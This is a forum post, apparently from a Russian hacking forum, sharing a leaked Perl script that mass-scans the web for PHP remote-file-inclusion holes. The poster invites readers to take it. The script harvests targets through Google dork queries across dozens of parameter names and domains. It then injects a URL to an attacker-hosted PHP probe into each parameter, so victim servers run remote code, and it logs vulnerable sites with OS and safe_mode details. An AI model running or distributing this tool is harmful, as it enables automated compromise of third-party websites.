Offline
Professional
    
Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005
Рейтинг: (0%) 

|
Поскольку скрипт просочился в паблик (смотреть здесь и здесь) скрывать его больше нет смысла. Налетай.
Код | #! /usr/bin/perl
# ================================================================ # # google-php-include-bugs searcher v 0.8 # # (c)oded by drmist\STNC # # www.security-teams.net # # # # ATTENTION. THIS SCRIPT IS PRIVATE. # # ONLY FOR STNC AND FRIENDS. NOT FOR SALE. # # # # Usage: perl script.pl --log=<log-file> --url=<test-script-url> # # Test script: # # <?php # # error_reporting(0); # # $s = md5("STNC"); # # $code = eregi("windows", php_uname())+ # # 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ # # 4*ini_get('safe_mode'); echo $s."[$code]".$s; # # ?> # # ================================================================ #
use IO::Socket;
@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat", "inc", "incl", "include", "read", "write", "data", "code", "fname", "filename", "cont", "content", "menu", "open", "file", "id", "p", "f", "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo", "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu", "conteudo");
@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am", "info", "name", "aero", "biz", "edu", "ws", "in", "cn", "us", "be", "it", "cc", "tv", "ru", "su", "jp", "kz", "se", "is", "ca", "gs", "ms", "vg", "be", "fi", "gov");
@ftypes = ("php", "php3");
$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");
for($i = 0; $i < @ARGV; $i++) { if($ARGV[$i] =~ /^--log=(.*)$/) { $log = $1; } elsif($ARGV[$i] =~ /^--url=(.*)$/) {$script = $1; } }
if(!($script && $log)){ usage(); exit; }
foreach $inc(@inc_bugs) { foreach $zone(@zones) { foreach $ftype(@ftypes) { $request = "filetype:$ftype site:$zone inurl:$inc="; print "\n[$request]\n";
$request =~ s/(.)/sprintf("%%%02x",ord($1))/eg; @dn = ();
for($i = 0;$i < 10; $i++) { @temp = get("http://www.google.com/search?filter=0&num=100&start=".$i. "00&q=$request") =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi; foreach $url (@temp) { if($url !~ /($inc=[^\&]+)/i) { next; } $left = $`; $right = $'; if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; } if($url =~ /google\.com/i){ next; }
($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/; if($domain =~ /^www\.(.+)$/) { $domain = $1; } $f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;} push @dn, $domain;
$print = "$left$inc=[INCLUDE]$right"; if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i) { $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n"; $count++; print "[$count] $s";
open LOG, ">>$log"; print LOG $s; close LOG; } else { print "$print - no bugs\n"; } } } } } }
sub timeout() { close $sock; }
sub get() { local $request = $_[0]; local $port = 80; local $data = "";
if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/) { if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }
$sock = IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM, TimeOut => $timeout ) or return 0; # connection failed
print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";
$SIG{ALRM} = \&timeout; alarm 10; while(<$sock>){ $data .= $_; } alarm 0; close $sock; }
return $data; }
sub usage() {
print qq(Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source> Test script: <?php error_reporting(0); \$s = md5("STNC"); \$code = eregi("windows", php_uname())+ 2*eregi("apache", getenv("SERVER_SOFTWARE"))+ 4*ini_get('safe_mode'); echo \$s."[\$code]".\$s; ?> );
} |
|